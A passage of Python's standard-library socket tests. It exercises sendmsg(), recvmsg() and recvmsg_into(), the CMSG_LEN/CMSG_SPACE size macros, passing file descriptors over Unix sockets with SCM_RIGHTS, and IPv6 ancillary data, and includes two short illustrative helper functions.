self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
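# Illustrative sketch (not part of the test suite): the size relationships
# exercised by CmsgMacroTests above, for a single payload size.  Guarded with
# hasattr() because the CMSG_*() macros are platform-dependent; nothing in
# this module calls it.
def _example_cmsg_sizes(n=SIZEOF_INT):
    if not (hasattr(socket, "CMSG_LEN") and hasattr(socket, "CMSG_SPACE")):
        return None
    # CMSG_LEN(n) is the exact cmsghdr-plus-data length for n payload bytes
    # (recvmsg() recovers n as CMSG_LEN(n) - CMSG_LEN(0)), while CMSG_SPACE(n)
    # additionally includes trailing padding, so it is at least as large.
    length = socket.CMSG_LEN(n)
    space = socket.CMSG_SPACE(n)
    assert length - socket.CMSG_LEN(0) == n
    assert space >= length
    return length, space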
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
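# Illustrative sketch (not part of the test suite): a minimal SCM_RIGHTS round
# trip over an AF_UNIX socketpair(), mirroring what SCMRightsTest exercises
# above.  POSIX-only; nothing in this module calls it, and the caller owns
# (and must close) the descriptors it returns.
def _example_pass_fd_over_socketpair(fd):
    left, right = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        # A single control message: (SOL_SOCKET, SCM_RIGHTS, packed C ints).
        left.sendmsg([b"x"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                               array.array("i", [fd]))])
        msg, ancdata, flags, addr = right.recvmsg(
            1, socket.CMSG_SPACE(SIZEOF_INT))
        fds = array.array("i")
        for cmsg_level, cmsg_type, cmsg_data in ancdata:
            if (cmsg_level == socket.SOL_SOCKET and
                    cmsg_type == socket.SCM_RIGHTS):
                # Drop any trailing partial integer before unpacking.
                fds.frombytes(cmsg_data[
                    :len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
        return list(fds)
    finally:
        left.close()
        right.close()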
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
